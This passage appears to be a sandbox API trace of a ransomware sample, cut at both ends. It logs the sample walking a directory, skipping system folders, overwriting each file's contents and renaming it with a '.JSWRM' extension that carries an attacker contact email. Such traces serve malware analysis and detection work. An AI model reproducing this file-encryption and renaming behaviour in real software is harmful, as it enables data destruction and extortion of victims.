(lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0062.759] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=104072) returned 1 [0062.759] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19680) returned 0x2471a8 [0062.760] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x19680, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x19680, lpOverlapped=0x0) returned 1 [0062.800] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.800] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x19680, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x19680, lpOverlapped=0x0) returned 1 [0062.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0062.800] CloseHandle (hObject=0x450) returned 1 [0062.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0062.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0062.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0062.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0062.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0062.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0062.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0062.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0062.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0062.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0062.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0062.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0062.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0062.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0062.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0062.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0062.803] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), lpNewFileName="C:\\588bce7c90097ed212\\watermark.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0062.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0062.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0062.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0062.804] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x2120bc00, ftLastWriteTime.dwHighDateTime=0x1cac6c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f5113, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="Windows6.0-KB956250-v6001-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0062.804] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2=".") returned 1 [0062.804] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="..") returned 1 [0062.804] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="...") returned 1 [0062.804] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="windows") returned 1 [0062.804] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="recovery") returned 1 [0062.804] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="perflogs") returned 1 [0062.804] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="documents and settings") returned 1 [0062.804] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="$RECYCLE.BIN") returned 1 [0062.804] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="system volume information") returned 1 [0062.804] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x64.msu", lpString2="msocache") returned 1 [0062.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0062.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.0-KB956250-v6001-x64.msu", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0062.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0062.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.0-KB956250-v6001-x64.msu", cchWideChar=33, lpMultiByteStr=0x22d490, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.0-KB956250-v6001-x64.msu", lpUsedDefaultChar=0x0) returned 33 [0062.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0062.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0062.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.0-KB956250-v6001-x64.msu", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0062.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0062.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.0-KB956250-v6001-x64.msu", cchWideChar=33, lpMultiByteStr=0x22d4c8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.0-KB956250-v6001-x64.msu", lpUsedDefaultChar=0x0) returned 33 [0062.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0062.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0062.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0062.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0062.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0062.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0062.805] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0062.806] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=5198099) returned 1 [0062.806] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0062.806] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0062.818] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.818] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0062.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0062.819] CloseHandle (hObject=0x450) returned 1 [0063.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0063.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0063.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0063.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0063.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0063.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0063.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0063.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0063.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x218b68 [0063.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0063.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.081] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0063.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x218b68 | out: hHeap=0x1e0000) returned 1 [0063.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0063.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0063.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0063.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0063.082] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x1bbe7400, ftLastWriteTime.dwHighDateTime=0x1cac6bf, nFileSizeHigh=0x0, nFileSizeLow=0x217520, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="Windows6.0-KB956250-v6001-x86.msu", cAlternateFileName="WINDOW~2.MSU")) returned 1 [0063.082] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2=".") returned 1 [0063.082] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="..") returned 1 [0063.082] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="...") returned 1 [0063.082] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="windows") returned 1 [0063.082] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="recovery") returned 1 [0063.082] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="perflogs") returned 1 [0063.082] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="documents and settings") returned 1 [0063.082] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="$RECYCLE.BIN") returned 1 [0063.082] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="system volume information") returned 1 [0063.082] lstrcmpiW (lpString1="Windows6.0-KB956250-v6001-x86.msu", lpString2="msocache") returned 1 [0063.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0063.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.0-KB956250-v6001-x86.msu", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0063.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.0-KB956250-v6001-x86.msu", cchWideChar=33, lpMultiByteStr=0x1f8328, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.0-KB956250-v6001-x86.msu", lpUsedDefaultChar=0x0) returned 33 [0063.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0063.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0063.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.0-KB956250-v6001-x86.msu", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0063.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.0-KB956250-v6001-x86.msu", cchWideChar=33, lpMultiByteStr=0x1f84e8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.0-KB956250-v6001-x86.msu", lpUsedDefaultChar=0x0) returned 33 [0063.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0063.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0063.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0063.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0063.083] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.083] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=2192672) returned 1 [0063.083] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.083] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0063.099] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.099] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0063.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.100] CloseHandle (hObject=0x450) returned 1 [0063.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0063.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0063.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0063.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0063.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0063.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0063.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x218b68 [0063.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0063.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.271] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0063.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x218b68 | out: hHeap=0x1e0000) returned 1 [0063.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0063.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0063.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.272] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x5b8e5700, ftLastWriteTime.dwHighDateTime=0x1cac6d1, nFileSizeHigh=0x0, nFileSizeLow=0x4db1ce, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="Windows6.1-KB958488-v6001-x64.msu", cAlternateFileName="WINDOW~3.MSU")) returned 1 [0063.272] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2=".") returned 1 [0063.272] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="..") returned 1 [0063.272] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="...") returned 1 [0063.272] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="windows") returned 1 [0063.272] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="recovery") returned 1 [0063.272] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="perflogs") returned 1 [0063.272] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="documents and settings") returned 1 [0063.272] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="$RECYCLE.BIN") returned 1 [0063.272] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="system volume information") returned 1 [0063.272] lstrcmpiW (lpString1="Windows6.1-KB958488-v6001-x64.msu", lpString2="msocache") returned 1 [0063.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0063.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB958488-v6001-x64.msu", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0063.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB958488-v6001-x64.msu", cchWideChar=33, lpMultiByteStr=0x1f8638, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.1-KB958488-v6001-x64.msu", lpUsedDefaultChar=0x0) returned 33 [0063.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0063.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0063.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB958488-v6001-x64.msu", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0063.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows6.1-KB958488-v6001-x64.msu", cchWideChar=33, lpMultiByteStr=0x1f8328, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows6.1-KB958488-v6001-x64.msu", lpUsedDefaultChar=0x0) returned 33 [0063.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0063.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0063.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0063.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 